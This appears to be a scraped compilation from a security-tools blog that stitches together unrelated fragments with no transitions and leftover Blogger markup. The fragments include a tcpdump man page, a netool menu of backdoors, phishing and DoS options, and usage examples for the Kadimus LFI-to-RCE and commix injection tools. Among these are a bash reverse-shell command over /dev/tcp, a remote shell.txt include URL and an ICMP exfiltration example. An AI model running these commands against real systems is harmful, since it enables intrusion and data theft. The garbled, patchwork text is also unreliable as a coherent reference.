• A customizable CSV containing ordered information gathered for each host, with a field for making notes/etc. 

• An elegant, searchable, JQuery-driven HTML report that shows screenshots, diagrams, and other information. 

packets ``captured'' (this is the number of packets that tcpdump has received and processed);

packets ``received by filter'' (the meaning of this depends on the OS on which you're running tcpdump, and possibly on the way the OS was configured - if a filter was specified on the command line, on some OSes it counts packets regardless of whether they were matched by the filter expression and, even if they were matched by the filter expression, regardless of whether tcpdump has read and processed them yet, on other OSes it counts only packets that were matched by the filter expression regardless of whether tcpdump has read and processed them yet, and on other OSes it counts only packets that were matched by the filter expression and were processed by tcpdump);

packets ``dropped by kernel'' (this is the number of packets that were dropped, due to a lack of buffer space, by the packet capture mechanism in the OS on which tcpdump is running, if the OS reports that information to applications; if not, it will be reported as 0).

OPTIONS

-A

Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.

-b

Print the AS number in BGP packets in ASDOT notation rather than ASPLAIN notation.

-B buffer_size

--buffer-size=buffer_size

Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes).

-c count

Exit after receiving count packets.

-C file_size

Before writing a raw packet to a savefile, check whether the file is currently larger than file_size and, if so, close the current savefile and open a new one. Savefiles after the first savefile will have the name specified with the -w flag, with a number after it, starting at 1 and continuing upward. The units of file_size are millions of bytes (1,000,000 bytes, not 1,048,576 bytes).

-d

Dump the compiled packet-matching code in a human readable form to standard output and stop.

-dd

Dump packet-matching code as a C program fragment.

-ddd

Dump packet-matching code as decimal numbers (preceded with a count).

-D

--list-interfaces

Print the list of the network interfaces available on the system and on which tcpdump can capture packets. For each network interface, a number and an interface name, possibly followed by a text description of the interface, is printed. The interface name or the number can be supplied to the -i flag to specify an interface on which to capture.

This can be useful on systems that don't have a command to list them (e.g., Windows systems, or UNIX systems lacking ifconfig -a); the number can be useful on Windows 2000 and later systems, where the interface name is a somewhat complex string.

The -D flag will not be supported if tcpdump was built with an older version of libpcap that lacks the pcap_findalldevs() function.

-e

Print the link-level header on each dump line. This can be used, for example, to print MAC layer addresses for protocols such as Ethernet and IEEE 802.11.

-E

Use spi@ipaddr algo:secret for decrypting IPsec ESP packets that are addressed to addr and contain Security Parameter Index value spi. This combination may be repeated with comma or newline separation.

Note that setting the secret for IPv4 ESP packets is supported at this time.

Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc, cast128-cbc, or none. The default is des-cbc. The ability to decrypt packets is only present if tcpdump was compiled with cryptography enabled.

secret is the ASCII text for ESP secret key. If preceded by 0x, then a hex value will be read.

The option assumes RFC2406 ESP, not RFC1827 ESP. The option is only for debugging purposes, and the use of this option with a true `secret' key is discouraged. By presenting IPsec secret key onto command line you make it visible to others, via ps(1) and other occasions.

In addition to the above syntax, the syntax file name may be used to have tcpdump read the provided file in. The file is opened upon receiving the first ESP packet, so any special permissions that tcpdump may have been given should already have been given up.

-f

Print `foreign' IPv4 addresses numerically rather than symbolically (this option is intended to get around serious brain damage in Sun's NIS server --- usually it hangs forever translating non-local internet numbers).

The test for `foreign' IPv4 addresses is done using the IPv4 address and netmask of the interface on which capture is being done. If that address or netmask are not available, available, either because the interface on which capture is being done has no address or netmask or because the capture is being done on the Linux "any" interface, which can capture on more than one interface, this option will not work correctly.

-F file

Use file as input for the filter expression. An additional expression given on the command line is ignored.

-G rotate_seconds

If specified, rotates the dump file specified with the -w option every rotate_seconds seconds. Savefiles will have the name specified by -w which should include a time format as defined by strftime(3). If no time format is specified, each new file will overwrite the previous.

If used in conjunction with the -C option, filenames will take the form of `file<count>'.

-h

--help

Print the tcpdump and libpcap version strings, print a usage message, and exit.

--version

Print the tcpdump and libpcap version strings and exit.

-H

Attempt to detect 802.11s draft mesh headers.

-i interface

--interface=interface

Listen on interface. If unspecified, tcpdump searches the system interface list for the lowest numbered, configured up interface (excluding loopback), which may turn out to be, for example, ``eth0''.

On Linux systems with 2.2 or later kernels, an interface argument of ``any'' can be used to capture packets from all interfaces. Note that captures on the ``any'' device will not be done in promiscuous mode.

If the -D flag is supported, an interface number as printed by that flag can be used as the interface argument.

-I

--monitor-mode

Put the interface in "monitor mode"; this is supported only on IEEE 802.11 Wi-Fi interfaces, and supported only on some operating systems.

Note that in monitor mode the adapter might disassociate from the network with which it's associated, so that you will not be able to use any wireless networks with that adapter. This could prevent accessing files on a network server, or resolving host names or network addresses, if you are capturing in monitor mode and are not connected to another network with another adapter.

This flag will affect the output of the -L flag. If -I isn't specified, only those link-layer types available when not in monitor mode will be shown; if -I is specified, only those link-layer types available when in monitor mode will be shown.

--immediate-mode

Capture in "immediate mode". In this mode, packets are delivered to tcpdump as soon as they arrive, rather than being buffered for efficiency. This is the default when printing packets rather than saving packets to a ``savefile'' if the packets are being printed to a terminal rather than to a file or pipe.

-j tstamp_type

--time-stamp-type=tstamp_type

Set the time stamp type for the capture to tstamp_type. The names to use for the time stamp types are given in pcap-tstamp(7); not all the types listed there will necessarily be valid for any given interface.

-J

--list-time-stamp-types

List the supported time stamp types for the interface and exit. If the time stamp type cannot be set for the interface, no time stamp types are listed.

--time-stamp-precision=tstamp_precision

When capturing, set the time stamp precision for the capture to tstamp_precision. Note that availability of high precision time stamps (nanoseconds) and their actual accuracy is platform and hardware dependent. Also note that when writing captures made with nanosecond accuracy to a savefile, the time stamps are written with nanosecond resolution, and the file is written with a different magic number, to indicate that the time stamps are in seconds and nanoseconds; not all programs that read pcap savefiles will be able to read those captures.

-K

--dont-verify-checksums

Don't attempt to verify IP, TCP, or UDP checksums. This is useful for interfaces that perform some or all of those checksum calculation in hardware; otherwise, all outgoing TCP checksums will be flagged as bad.

-l

Make stdout line buffered. Useful if you want to see the data while capturing it. E.g.,

tcpdump -l | tee dat

or

tcpdump -l > dat & tail -f dat

Note that on Windows,``line buffered'' means ``unbuffered'', so that WinDump will write each character individually if -l is specified.

-U is similar to -l in its behavior, but it will cause output to be ``packet-buffered'', so that the output is written to stdout at the end of each packet rather than at the end of each line; this is buffered on all platforms, including Windows.

-L

--list-data-link-types

List the known data link types for the interface, in the specified mode, and exit. The list of known data link types may be dependent on the specified mode; for example, on some platforms, a Wi-Fi interface might support one set of data link types when not in monitor mode (for example, it might support only fake Ethernet headers, or might support 802.11 headers but not support 802.11 headers with radio information) and another set of data link types when in monitor mode (for example, it might support 802.11 headers, or 802.11 headers with radio information, only in monitor mode).

-m module

Load SMI MIB module definitions from file module. This option can be used several times to load several MIB modules into tcpdump.

-M secret

Use secret as a shared secret for validating the digests found in TCP segments with the TCP-MD5 option (RFC 2385), if present.

-n

Don't convert addresses (i.e., host addresses, port numbers, etc.) to names.

-N

Don't print domain name qualification of host names. E.g., if you give this flag then tcpdump will print ``nic'' instead of ``nic.ddn.mil''.

-#

--number

Print an optional packet number at the beginning of the line.

-O

--no-optimize

Do not run the packet-matching code optimizer. This is useful only if you suspect a bug in the optimizer.

-p

--no-promiscuous-mode

Don't put the interface into promiscuous mode. Note that the interface might be in promiscuous mode for some other reason; hence, `-p' cannot be used as an abbreviation for `ether host {local-hw-addr} or ether broadcast'.

-Q direction

--direction=direction

Choose send/receive direction direction for which packets should be captured. Possible values are `in', `out' and `inout'. Not available on all platforms.

-q

Quick (quiet?) output. Print less protocol information so output lines are shorter.

-R

Assume ESP/AH packets to be based on old specification (RFC1825 to RFC1829). If specified, tcpdump will not print replay prevention field. Since there is no protocol version field in ESP/AH specification, tcpdump cannot deduce the version of ESP/AH protocol.

-r file

Read packets from file (which was created with the -w option or by other tools that write pcap or pcap-ng files). Standard input is used if file is ``-''.

-S

--absolute-tcp-sequence-numbers

Print absolute, rather than relative, TCP sequence numbers.

-s snaplen

--snapshot-length=snaplen

Snarf snaplen bytes of data from each packet rather than the default of 65535 bytes. Packets truncated because of a limited snapshot are indicated in the output with ``[|proto]'', where protois the name of the protocol level at which the truncation has occurred. Note that taking larger snapshots both increases the amount of time it takes to process packets and, effectively, decreases the amount of packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number that will capture the protocol information you're interested in. Setting snaplen to 0 sets it to the default of 65535, for backwards compatibility with recent older versions of tcpdump.

-T type

Force packets selected by "expression" to be interpreted the specified type. Currently known types are aodv (Ad-hoc On-demand Distance Vector protocol), carp (Common Address Redundancy Protocol), cnfp (Cisco NetFlow protocol), lmp (Link Management Protocol), pgm (Pragmatic General Multicast), pgm_zmtp1 (ZMTP/1.0 inside PGM/EPGM), radius (RADIUS), rpc (Remote Procedure Call), rtp (Real-Time Applications protocol), rtcp (Real-Time Applications control protocol), snmp (Simple Network Management Protocol), tftp (Trivial File Transfer Protocol), vat (Visual Audio Tool), wb (distributed White Board), zmtp1 (ZeroMQ Message Transport Protocol 1.0) and vxlan (Virtual eXtensible Local Area Network).

Note that the pgm type above affects UDP interpretation only, the native PGM is always recognised as IP protocol 113 regardless. UDP-encapsulated PGM is often called "EPGM" or "PGM/UDP".

Note that the pgm_zmtp1 type above affects interpretation of both native PGM and UDP at once. During the native PGM decoding the application data of an ODATA/RDATA packet would be decoded as a ZeroMQ datagram with ZMTP/1.0 frames. During the UDP decoding in addition to that any UDP packet would be treated as an encapsulated PGM packet.

-t

Don't print a timestamp on each dump line.

-tt

Print the timestamp, as seconds since January 1, 1970, 00:00:00, UTC, and fractions of a second since that time, on each dump line.

-ttt

Print a delta (micro-second resolution) between current and previous line on each dump line.

-tttt

Print a timestamp, as hours, minutes, seconds, and fractions of a second since midnight, preceded by the date, on each dump line.

-ttttt

Print a delta (micro-second resolution) between current and first line on each dump line.

-u

Print undecoded NFS handles.

-U

--packet-buffered

If the -w option is not specified, make the printed packet output ``packet-buffered''; i.e., as the description of the contents of each packet is printed, it will be written to the standard output, rather than, when not writing to a terminal, being written only when the output buffer fills.

If the -w option is specified, make the saved raw packet output ``packet-buffered''; i.e., as each packet is saved, it will be written to the output file, rather than being written only when the output buffer fills.

The -U flag will not be supported if tcpdump was built with an older version of libpcap that lacks the pcap_dump_flush() function.

-v

When parsing and printing, produce (slightly more) verbose output. For example, the time to live, identification, total length and options in an IP packet are printed. Also enables additional packet integrity checks such as verifying the IP and ICMP header checksum.

When writing to a file with the -w option, report, every 10 seconds, the number of packets captured.

-vv

Even more verbose output. For example, additional fields are printed from NFS reply packets, and SMB packets are fully decoded.

-vvv

Even more verbose output. For example, telnet SB ... SE options are printed in full. With -X Telnet options are printed in hex as well.

-V file

Read a list of filenames from file. Standard input is used if file is ``-''.

-w file

Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ``-''.

This output will be buffered if written to a file or pipe, so a program reading from the file or pipe may not see packets for an arbitrary amount of time after they are received. Use the -U flag to cause packets to be written as soon as they are received.

The MIME type application/vnd.tcpdump.pcap has been registered with IANA for pcap files. The filename extension .pcapappears to be the most commonly used along with .cap and .dmp. Tcpdump itself doesn't check the extension when reading capture files and doesn't add an extension when writing them (it uses magic numbers in the file header instead). However, many operating systems and applications will use the extension if it is present and adding one (e.g. .pcap) is recommended.

See pcap-savefile(5) for a description of the file format.

-W

Used in conjunction with the -C option, this will limit the number of files created to the specified number, and begin overwriting files from the beginning, thus creating a 'rotating' buffer. In addition, it will name the files with enough leading 0s to support the maximum number of files, allowing them to sort correctly.

Used in conjunction with the -G option, this will limit the number of rotated dump files that get created, exiting with status 0 when reaching the limit. If used with -C as well, the behavior will result in cyclical files per timeslice.

-x

When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be printed. Note that this is the entire link-layer packet, so for link layers that pad (e.g. Ethernet), the padding bytes will also be printed when the higher layer packet is shorter than the required padding.

-xx

When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex.

-X

When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and ASCII. This is very handy for analysing new protocols.

-XX

When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex and ASCII.

-y datalinktype

--linktype=datalinktype

Set the data link type to use while capturing packets to datalinktype.

-z postrotate-command

Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.

Note that tcpdump will run the command in parallel to the capture, using the lowest priority so that this doesn't disturb the capture process.

And in case you would like to use a command that itself takes flags or different arguments, you can always write a shell script that will take the savefile name as the only argument, make the flags & arguments arrangements and execute the command that you want.

-Z user

--relinquish-privileges=user

If tcpdump is running as root, after opening the capture device or input savefile, but before opening any savefiles for output, change the user ID to user and the group ID to the primary group of user.

This behavior can also be enabled by default at compile time.

expression

selects which packets will be dumped. If no expressionis given, all packets on the net will be dumped. Otherwise, only packets for which expression is `true' will be dumped. For the expression syntax, see pcap-filter(7).

The expression argument can be passed to tcpdump as either a single Shell argument, or as multiple Shell arguments, whichever is more convenient. Generally, if the expression contains Shell metacharacters, such as backslashes used to escape protocol names, it is easier to pass it as a single, quoted argument rather than to escape the Shell metacharacters. Multiple arguments are concatenated with spaces before being parsed.

EXAMPLES

tcpdump host sundown

tcpdump host helios and \( hot or ace \)

tcpdump ip host ace and not helios

tcpdump net ucb-ether

tcpdump 'gateway snup and (port ftp or ftp-data)'

tcpdump ip and not net localnet

tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0 and not src and dst net localnet'

tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

tcpdump 'gateway snup and ip[2:2] > 576'

tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224'

tcpdump 'icmp[icmptype] != icmp-echo and icmp[icmptype] != icmp-echoreply'

  "1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
<- data-blogger-escaped--="" data-blogger-escaped-addon="" data-blogger-escaped-config="" data-blogger-escaped-etrieve="" data-blogger-escaped-firefox="" data-blogger-escaped-metadata="" data-blogger-escaped-p="" data-blogger-escaped-pen="" data-blogger-escaped-router="" data-blogger-escaped-tracer="" data-blogger-escaped-webcrawler="" data-blogger-escaped-whois="">
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
<- data-blogger-escaped--="" data-blogger-escaped-php="" data-blogger-escaped-webcrawler=""> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
<- data-blogger-escaped--="" data-blogger-escaped-automated="" data-blogger-escaped-engeneering="" data-blogger-escaped-exploits="" data-blogger-escaped-phishing="" data-blogger-escaped-r00tsect0r="" data-blogger-escaped-social="">
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
<- data-blogger-escaped-a.="" data-blogger-escaped-about="" data-blogger-escaped-access="" data-blogger-escaped-attack="" data-blogger-escaped-aunch="" data-blogger-escaped-c.="" data-blogger-escaped-check="" data-blogger-escaped-code="" data-blogger-escaped-config="" data-blogger-escaped-cupp.py="" data-blogger-escaped-d.="" data-blogger-escaped-database="" data-blogger-escaped-db.="" data-blogger-escaped-delete="" data-blogger-escaped-etter.filters="" data-blogger-escaped-ettercap="" data-blogger-escaped-execute="" data-blogger-escaped-files="" data-blogger-escaped-filter="" data-blogger-escaped-folders="" data-blogger-escaped-for="" data-blogger-escaped-hare="" data-blogger-escaped-how="" data-blogger-escaped-lan="" data-blogger-escaped-local="" data-blogger-escaped-lock="" data-blogger-escaped-mitm="" data-blogger-escaped-netool="" data-blogger-escaped-niff="" data-blogger-escaped-ns-spoofing="" data-blogger-escaped-ommon="" data-blogger-escaped-ompile="" data-blogger-escaped-on="" data-blogger-escaped-onfig="" data-blogger-escaped-os="" data-blogger-escaped-password="" data-blogger-escaped-passwords="" data-blogger-escaped-pics="" data-blogger-escaped-profiler="" data-blogger-escaped-q.="" data-blogger-escaped-quit="" data-blogger-escaped-remote="" data-blogger-escaped-ssl="" data-blogger-escaped-toolkit="" data-blogger-escaped-u.="" data-blogger-escaped-updates="" data-blogger-escaped-urls="" data-blogger-escaped-user="" data-blogger-escaped-visited="">

• Perform an efficient malware analysis of suspicious files based on the results of a set of antivirus solutions, bundled together to reach the highest possible probability to detect potential malware;
• Search for malware samples in a progressively increasing malware repository.

• Download malware samples (15 samples/day for registered users and 100 samples/day for premium users);
• Perform confidential malware analysis (reserved to premium users)

• Submit suspicious file via AVCaesar web interface. Premium users can choose to perform a confidential analysis.
• Receive a well-structured malware analysis report.

• Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details.
• Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash.
• BlueScreenView enumerates the memory addresses inside the stack of the crash, and find all drivers/modules that might be involved in the crash.
• BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (In Advanced Options).
• BlueScreenView automatically locate the drivers appeared in the crash dump, and extract their version resource information, including product name, file version, company, and file description. 

1. Support HTTP / HTTPS / SOCKS4 / SOCKS5 proxy
2. Support basic / NTLM / NTLMv2 authentication methods
3. Individual proxy for only one or several apps
4. Multiple profiles support
5. Bind configuration to WIFI's SSID / Mobile Network (2G / 3G)
6. Widgets for quickly switching on/off proxy
7. Low battery and memory consumption (written in C and compiled as native binary)
8. Bypass custom IP address
9. DNS proxy for guys behind the firewall that disallows to resolve external addresses
10. PAC file support (only basic support, thanks to Rhino)

1. It sets up multiple common ports that are attacked. If someone connects to these ports, it blacklists them forever (to remove blacklisted ip's, remove them from /var/artillery/banlist.txt)
2. It monitors what folders you specify, by default it checks /var/www and /etc for modifications.
3. It monitors the SSH logs and looks for brute force attempts.
4. It will email you when attacks occur and let you know what the attack was.

• src/core.py - main central code reuse for things shared between each module
• src/monitor.py - main monitoring module for changes to the filesystem
• src/ssh_monitor.py - main monitoring module for SSH brute forcing
• src/honeypot.py - main module for honeypot detection
• src/harden.py - check for basic hardening to the OS
• database/integrity.data - main database for maintaining sha512 hashes of filesystem
• setup.py - copies files to /var/artillery/ then edits /etc/init.d/artillery to ensure artillery starts per each reboot

• Linux
• Windows

• Recommended to use Kali linux.
• Ettercap.
• Sslstrip.
• Airbase-ng include in aircrack-ng.
• DHCP.
• Nmap.

$ sudo apt-get install isc-dhcp-server

$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

$ sudo yum install dhcp

• Check all url parameters
• /var/log/auth.log RCE
• /proc/self/environ RCE
• php://input RCE
• data://text RCE
• Source code disclosure
• Multi thread scanner
• Command shell interface through HTTP Request
• Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)

• CentOS/Fedora

# yum install libcurl-devel

• Debian based

# apt-get install libcurl4-openssl-dev

• CentOS/Fedora

# yum install libpcre-devel

• Debian based

# apt-get install libpcre3-dev

• CentOS/Fedora

# yum install libssh-devel

• Debian based

# apt-get install libssh-dev

  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg

./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

http://bad-url.com/shell.txt?:scorpion say get over here

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0

git clone https://github.com/stasinopoulos/commix.git commix

--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" 

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

1. Open cmd.exe on Windows or Terminal on Mac OS
2. Drag downloaded file in the terminal
3. Hit space (it it wasn't added automatically after the filename) and type “–help” (with two dashes)
4. Some help will be shown to you
5. You may want to run the examples first
6. Start bruteforcing!

• MD2 – 32 characters
• MD4 – 32 characters
• MD5 – 32 characters
• SHA1 – 40 characters
• SHA224 – 56 characters
• SHA256 – 64 characters
• SHA384 – 96 characters
• SHA512 – 128 characters

• Dummy – using letter combinations of letters of given alphabet
• Random – using random letter combinations of letters of given alphabet (use if other types do not succeed)
• Wordlist-based – using words from given wordlist

• Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
• More cards/drivers supported
• More OS and platforms supported
• PTW attack
• WEP dictionary attack
• Fragmentation attack
• WPA Migration mode
• Improved cracking speed
• Capture with multiple cards
• New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng
• Optimizations, other improvements and bug fixing
• …

‘Attack’ Mode

Advanced Fuzzing

Scan Policies

Scan Dialogs with Advanced Options

Hiding Unused Tabs

New Add-ons

• Access Control Testing: adds the ability to automate many aspects of access control testing.
• Sequence Scanning: adds the ability to scan 'sequences' of web pages, in other words pages that must be visited in a strict order in order to work correctly.

New Scan Rules

• Relative Path Confusion: Allows ZAP to scan for issues that may result in XSS, by detecting if the browser can be fooled into interpreting HTML as CSS.
• Proxy Disclosure: Allows ZAP to detect forward and reverse proxies between the ZAP instance and the origin web server / application server.
• Storability / Cacheability: Allows ZAP to passively determine whether a page is storable by a shared cache, and whether it can be served from that cache in response to a similar request. This is useful from both a privacy and application performance perspective. The scanner follows RFC 7234.

Changed Scan Rules

• External Redirect: This plugin’s ID has been changed from 30000 to 20019, in order to more closely align with the established groupings. (This change may be of importance to **API Users**). Additionally some minor changes have been implemented to prevent collisions between injected values and in-page content, and improve performance. (Issues: 1529 and 1569)
• Session ID in URL Rewrite: This plugin has been updated with a minimum length check for the value of the parameters it looks for. A false positive condition was raised related to this plugin (Issue 1396) whereby sID=5 would trigger a finding. Minimum length for session IDs as this plugin interprets them is now eight (8) characters.
• Client Browser Cache: The active scan rule TestClientBrowserCache has been removed. Checks performed by the passive scan rule CacheControlScanner have been slightly modified. (Issue 1499)

More User Interface Changes

• The ZAP splash screen is back: It now includes new graphics, a tips & tricks module, and loading/progress info.
• The active scan dialog show the real plugin’s progress status based on the number of nodes that need to be scanned.
• There is a new session persistence options dialog that prompts the user for their preferred settings at startup (you can choose to “Remember” the option and not be asked again).
• For all Alerts the Risk field (False Positive, Suspicious, Warning) has been replaced with a more appropriately defined Confidence field (False Positive, Low, Medium, High, or Confirmed).
• Timestamps are now optionally available for the output tab.

Extended API Support

Internationalized Help Add-ons

Release Notes

1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
3. Non-intrusive, will not raise alarms or damage production sites
4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks

• ASP.NET VIEWSTATE insecure configurations
• JavaServer MyFaces ViewState without cryptographic protections
• Cross-domain stylesheet and javascript references
• User-controllable cross-domain references
• User-controllable attribute values such as href, form action, etc.
• User-controllable javascript events (e.g. onclick)
• Cross-domain form POSTs
• Insecure cookies which don't set the HTTPOnly or secure flags
• Open redirects which can be abused by spammers and phishers
• Insecure Flash object parameters useful for cross-site scripting
• Insecure Flash crossdomain.xml
• Insecure Silverlight clientaccesspolicy.xml
• Charset declarations which could introduce vulnerability (non-UTF-8)
• User-controllable charset declarations
• Dangerous context-switching between HTTP and HTTPS
• Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
• Potential HTTP referer leaks of sensitive user-information
• Potential information leaks in URL parameters
• Source code comments worth a closer look
• Insecure authentication protocols like Digest and Basic
• SSL certificate validation errors
• SSL insecure protocol issues (allowing SSL v2)
• Unicode issues with invalid byte streams
• Sharepoint insecurity checks
• more….

Release Notes